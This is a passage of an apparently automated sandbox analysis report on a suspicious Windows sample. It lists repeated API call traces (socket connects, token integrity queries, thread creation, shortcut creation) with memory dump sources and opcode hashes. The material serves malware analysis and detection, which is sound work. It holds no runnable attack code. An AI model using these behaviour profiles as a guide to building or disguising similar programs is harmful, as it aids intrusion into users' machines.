                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 000EDCFC
                            • GetSystemMetrics.USER32(00000004), ref: 000EDD24
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,000D407D,00000000), ref: 000EDD42
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$Long$MetricsSystem
                            • String ID:
                            • API String ID: 2294984445-0
                            • Opcode ID: ed34f185b36bccefede8497ab4266ffd245c573283bfa8d5f9e3d455f293c29b
                            • Instruction ID: a524732250987cd8dd4af8a9179d0d35c5a8a968b2906b5f38942f5627b7e10f
                            • Opcode Fuzzy Hash: ed34f185b36bccefede8497ab4266ffd245c573283bfa8d5f9e3d455f293c29b
                            • Instruction Fuzzy Hash: 3E21C871608252AFCB605F7A9C44B6937E5FB46375F200736F936E65E0D77098A0CB90
                            APIs
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000BCA86
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000BCAB8
                            • __itow.LIBCMT ref: 000BCAD0
                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000BCAF6
                            • __itow.LIBCMT ref: 000BCB07
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$__itow$_memmove
                            • String ID:
                            • API String ID: 2983881199-0
                            • Opcode ID: 66b5de375b00b8cb88f5d8f7027c5e023e8463a67e00af6d23bb80570cf04a7b
                            • Instruction ID: 869ebb3bee794978d45bb330b8ff0b8c48062188b15d74fc5471192c12b3632c
                            • Opcode Fuzzy Hash: 66b5de375b00b8cb88f5d8f7027c5e023e8463a67e00af6d23bb80570cf04a7b
                            • Instruction Fuzzy Hash: 3F21D5727002087BEB21EAA89C47EDE7AA9EF9D710F104028F985E7182D7B1CD4587A5
                            APIs
                              • Part of subcall function 00083B1E: _wcsncpy.LIBCMT ref: 00083B32
                            • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 000C6DBA
                            • GetLastError.KERNEL32 ref: 000C6DC5
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 000C6DD9
                            • _wcsrchr.LIBCMT ref: 000C6DFB
                              • Part of subcall function 000C6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 000C6E31
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                            • String ID:
                            • API String ID: 3633006590-0
                            • Opcode ID: 8bb50645f774c73f176ff2f1fda0db434c1d0083070b6a89179d927c23e67d3d
                            • Instruction ID: 12f2f6c4ca9b2ac8184370f4f78a15f8a27e33bce2c6d1038f7a45c4ac6aa557
                            • Opcode Fuzzy Hash: 8bb50645f774c73f176ff2f1fda0db434c1d0083070b6a89179d927c23e67d3d
                            • Instruction Fuzzy Hash: 92219075A013189ADB7067B4EC5AFEE33AC9F02710F20055AE561C7092EF62CE849A54
                            APIs
                              • Part of subcall function 000DACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 000DACF5
                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000D9160
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D916F
                            • connect.WSOCK32(00000000,?,00000010), ref: 000D918B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorLastconnectinet_addrsocket
                            • String ID:
                            • API String ID: 3701255441-0
                            • Opcode ID: af7600d2654df70082205605f1087de9fef1a57cbce63fb4414769d874728ef2
                            • Instruction ID: f08b506004fe0a2341bca7a63a3f73beb928d5477587fffb87241f2bf6227631
                            • Opcode Fuzzy Hash: af7600d2654df70082205605f1087de9fef1a57cbce63fb4414769d874728ef2
                            • Instruction Fuzzy Hash: 51219335300211AFDB00BF68DC89FAE77E9EF49724F04855AF9569B392DAB0EC418761
                            APIs
                            • IsWindow.USER32(00000000), ref: 000D89CE
                            • GetForegroundWindow.USER32 ref: 000D89E5
                            • GetDC.USER32(00000000), ref: 000D8A21
                            • GetPixel.GDI32(00000000,?,00000003), ref: 000D8A2D
                            • ReleaseDC.USER32(00000000,00000003), ref: 000D8A68
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$ForegroundPixelRelease
                            • String ID:
                            • API String ID: 4156661090-0
                            • Opcode ID: c6e5f2c54ac4cb5a72a741a97bc5292535141ddd526d693948bd477ff856b14a
                            • Instruction ID: b009183451ed3e4bd43376de3c51322baa1d6c99420a53032ec02c732f804f46
                            • Opcode Fuzzy Hash: c6e5f2c54ac4cb5a72a741a97bc5292535141ddd526d693948bd477ff856b14a
                            • Instruction Fuzzy Hash: 5E218175A00204AFDB00EFA5DC99AAEBBF5EF48311F058479F98997752CB70AD40CB60
                            APIs
                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0009B5EB
                            • SelectObject.GDI32(?,00000000), ref: 0009B5FA
                            • BeginPath.GDI32(?), ref: 0009B611
                            • SelectObject.GDI32(?,00000000), ref: 0009B63B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ObjectSelect$BeginCreatePath
                            • String ID:
                            • API String ID: 3225163088-0
                            • Opcode ID: b75f5dea0755512556e18c5062e918d5898c4e82b69395f574444d46e9fe2283
                            • Instruction ID: 409897af01e952ce59e2649495db089f9a23f929f19022c179fe5d8a923bc337
                            • Opcode Fuzzy Hash: b75f5dea0755512556e18c5062e918d5898c4e82b69395f574444d46e9fe2283
                            • Instruction Fuzzy Hash: A4218B7490030AFBDF209F59FE487A97BE9FB12325F14412AF554925B0D3B498D2EB50
                            APIs
                            • __calloc_crt.LIBCMT ref: 000A2E81
                            • CreateThread.KERNEL32(?,?,000A2FB7,00000000,?,?), ref: 000A2EC5
                            • GetLastError.KERNEL32 ref: 000A2ECF
                            • _free.LIBCMT ref: 000A2ED8
                            • __dosmaperr.LIBCMT ref: 000A2EE3
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                            • String ID:
                            • API String ID: 2664167353-0
                            • Opcode ID: 8ac5a750ad80b02041320b6c79d00444f2661761f39f548e52a0502dc18d738b
                            • Instruction ID: eb619b762a0f1fc937bff276bb4582082e9747817e710044a894c289f94057d3
                            • Opcode Fuzzy Hash: 8ac5a750ad80b02041320b6c79d00444f2661761f39f548e52a0502dc18d738b
                            • Instruction Fuzzy Hash: AE11A132105706AFD720EFE9AC41DAB7BE8EF46760B104539FA5886192EF71C8408761
                            APIs
                            • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000BB903
                            • GetLastError.KERNEL32(?,000BB3CB,?,?,?), ref: 000BB90D
                            • GetProcessHeap.KERNEL32(00000008,?,?,000BB3CB,?,?,?), ref: 000BB91C
                            • HeapAlloc.KERNEL32(00000000,?,000BB3CB,?,?,?), ref: 000BB923
                            • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000BB93A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 842720411-0
                            • Opcode ID: 0557b1211d94e5d0b344e76b3add0aa2527e6ca726594abe007d03e4a47b2a7b
                            • Instruction ID: c49388e806df7a6232631a90475d90e1afd1f839d5c3e851916f2306e709ba83
                            • Opcode Fuzzy Hash: 0557b1211d94e5d0b344e76b3add0aa2527e6ca726594abe007d03e4a47b2a7b
                            • Instruction Fuzzy Hash: CC011D71201204BFDB215FA5EC88DAB7BADEF8A764B100429F585C3250DBB19C81DA60
                            APIs
                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C8371
                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 000C837F
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000C8387
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 000C8391
                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C83CD
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: PerformanceQuery$CounterSleep$Frequency
                            • String ID:
                            • API String ID: 2833360925-0
                            • Opcode ID: 38c4f6f3c4d9829ebd12868d4efc6ea9909329baf7bb481b277ab211149815f4
                            • Instruction ID: e2440fa94a4718d2d2957d9a67a2cf8ff9dec1fcc90acb7a1d91f1fdd07c0f9f
                            • Opcode Fuzzy Hash: 38c4f6f3c4d9829ebd12868d4efc6ea9909329baf7bb481b277ab211149815f4
                            • Instruction Fuzzy Hash: 4B012D35D00629DBCF00AFE8ED48AEEBB78FB08B11F01515AE541B2550DFB0969087A5
                            APIs
                            • CLSIDFromProgID.OLE32 ref: 000BA874
                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 000BA88F
                            • lstrcmpiW.KERNEL32(?,00000000), ref: 000BA89D
                            • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 000BA8AD
                            • CLSIDFromString.OLE32(?,?), ref: 000BA8B9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: From$Prog$FreeStringTasklstrcmpi
                            • String ID:
                            • API String ID: 3897988419-0
                            • Opcode ID: 9ecf3a054bde58ca75530c246e6934ece85767b3cde3cdb733b57927883f0fd9
                            • Instruction ID: fca7d1067636495ae10c1790cea3e66eb5f5c2dd27c248712618da0c6aef1355
                            • Opcode Fuzzy Hash: 9ecf3a054bde58ca75530c246e6934ece85767b3cde3cdb733b57927883f0fd9
                            • Instruction Fuzzy Hash: 49018F76600204AFDB114FA4EC44BAA7BEDEF45361F108026F941D6610EBB1DD818BA1
                            APIs
                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000BB7A5
                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000BB7AF
                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000BB7BE
                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000BB7C5
                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000BB7DB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HeapInformationToken$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 44706859-0
                            • Opcode ID: 56d84c90cd2747a890f0327a1099978c51db655e8e9cfbda9a2eaa31b213a61b
                            • Instruction ID: ad24cd15866468b738241bd7d751902496a866b8db3035374217b337f0bf424c
                            • Opcode Fuzzy Hash: 56d84c90cd2747a890f0327a1099978c51db655e8e9cfbda9a2eaa31b213a61b
                            • Instruction Fuzzy Hash: 77F04F712802046FEB101FA5EC89EA73BACFF8A755F104059F985C7150DBB0DC828A60
                            APIs
                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000BB806
                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000BB810
                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000BB81F
                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000BB826
                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000BB83C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HeapInformationToken$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 44706859-0
                            • Opcode ID: 591160279a92b6f63775aadedd6f8d96f315b426c1d64adb4c97161c1adf5b70
                            • Instruction ID: ec68c2eeb0a56e8f1299c28fdf76af13e93d3ce06c0bab7ce3983a038698b3d8
                            • Opcode Fuzzy Hash: 591160279a92b6f63775aadedd6f8d96f315b426c1d64adb4c97161c1adf5b70
                            • Instruction Fuzzy Hash: 6EF04975200205AFEB611FA5FC88EAB3BACFF4A754F000029F985C7250CBB09881CAA0
                            APIs
                            • GetDlgItem.USER32(?,000003E9), ref: 000BFA8F
                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 000BFAA6
                            • MessageBeep.USER32(00000000), ref: 000BFABE
                            • KillTimer.USER32(?,0000040A), ref: 000BFADA
                            • EndDialog.USER32(?,00000001), ref: 000BFAF4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                            • String ID:
                            • API String ID: 3741023627-0
                            • Opcode ID: 1ebe25e49be8f8deb82403f90f98bb26c95d337a2e0baaa5ed392652fa6102b1
                            • Instruction ID: f0a3f3686af471efc9ae913557950dc06572ff6200b575410610280ec40b27a0
                            • Opcode Fuzzy Hash: 1ebe25e49be8f8deb82403f90f98bb26c95d337a2e0baaa5ed392652fa6102b1
                            • Instruction Fuzzy Hash: DF018670500705ABEB349B50ED4EBE677B8FB00B09F0401A9B587A54E1DBF0A984CB41
                            APIs
                            • EndPath.GDI32(?), ref: 0009B526
                            • StrokeAndFillPath.GDI32(?,?,000FF583,00000000,?), ref: 0009B542
                            • SelectObject.GDI32(?,00000000), ref: 0009B555
                            • DeleteObject.GDI32 ref: 0009B568
                            • StrokePath.GDI32(?), ref: 0009B583
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Path$ObjectStroke$DeleteFillSelect
                            • String ID:
                            • API String ID: 2625713937-0
                            • Opcode ID: 96d9ca9f631a067e7f9b89d8a5986c5e3f24556498ea1ae28aab8ac8cffb09a9
                            • Instruction ID: d12aa0e2e9109519c68f461bc2a8fff517c0af2c223443fa712214dad12f8438
                            • Opcode Fuzzy Hash: 96d9ca9f631a067e7f9b89d8a5986c5e3f24556498ea1ae28aab8ac8cffb09a9
                            • Instruction Fuzzy Hash: D8F0C43804060AABDB656F65FE087683FE5AB12362F188214F4A9459F4DB7089D6EF50
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 000CFAB2
                            • CoCreateInstance.OLE32(0010DA7C,00000000,00000001,0010D8EC,?), ref: 000CFACA
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • CoUninitialize.OLE32 ref: 000CFD2D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize_memmove
                            • String ID: .lnk
                            • API String ID: 2683427295-24824748
                            • Opcode ID: 6d8ce6c29b2f10f5b74d1ff8fd648714d9adeb3d7ad5e6c745306d2fe3c77489
                            • Instruction ID: 72ce5d8c73da080bf3e7d1a1e2327268683f388954ed3e986a3d369e37904aef
                            • Opcode Fuzzy Hash: 6d8ce6c29b2f10f5b74d1ff8fd648714d9adeb3d7ad5e6c745306d2fe3c77489
                            • Instruction Fuzzy Hash: 55A11B71504205AFD704EF64CC91EABB7EDBF98704F40892DF19597192EB70EA09CBA2
                            APIs
                              • Part of subcall function 000C78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 000C78CB
                            • CoInitialize.OLE32(00000000), ref: 000CF04D
                            • CoCreateInstance.OLE32(0010DA7C,00000000,00000001,0010D8EC,?), ref: 000CF066
                            • CoUninitialize.OLE32 ref: 000CF083
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                            • String ID: .lnk
                            • API String ID: 2126378814-24824748
                            • Opcode ID: b3ab24b9d97b16a7bd100ad1d75e04815658b8165a0a1e24229a39cdc6b7cc72
                            • Instruction ID: c5c440f6f340fabff9a999a85cbdf3524506e6a95fb3589e67e78ee003ad6813
                            • Opcode Fuzzy Hash: b3ab24b9d97b16a7bd100ad1d75e04815658b8165a0a1e24229a39cdc6b7cc72
                            • Instruction Fuzzy Hash: CEA126756043029FCB14EF54C884E6EBBE6BF88320F148559F8959B3A2CB31ED45CB92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID: #$+
                            • API String ID: 0-2552117581
                            • Opcode ID: ecee6a69afc0b13fd0725bf9c1fd23e39c41516af00795ae9a828f1d77c2fd42
                            • Instruction ID: 8636d6bed3b7b7606610d10bb63b2652e1b768d2e52a5c4a6a99b0a97a770000
                            • Opcode Fuzzy Hash: ecee6a69afc0b13fd0725bf9c1fd23e39c41516af00795ae9a828f1d77c2fd42
                            • Instruction Fuzzy Hash: 34510E3550425ACFDF65EF68C880AFE7BE0AF26320F544066FE819B291D7349D42EB20
                            APIs
                            • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0011DC40,?,0000000F,0000000C,00000016,0011DC40,?), ref: 000C507B
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                              • Part of subcall function 0008B8A7: _memmove.LIBCMT ref: 0008B8FB
                            • CharUpperBuffW.USER32(?,?,00000000,?), ref: 000C50FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
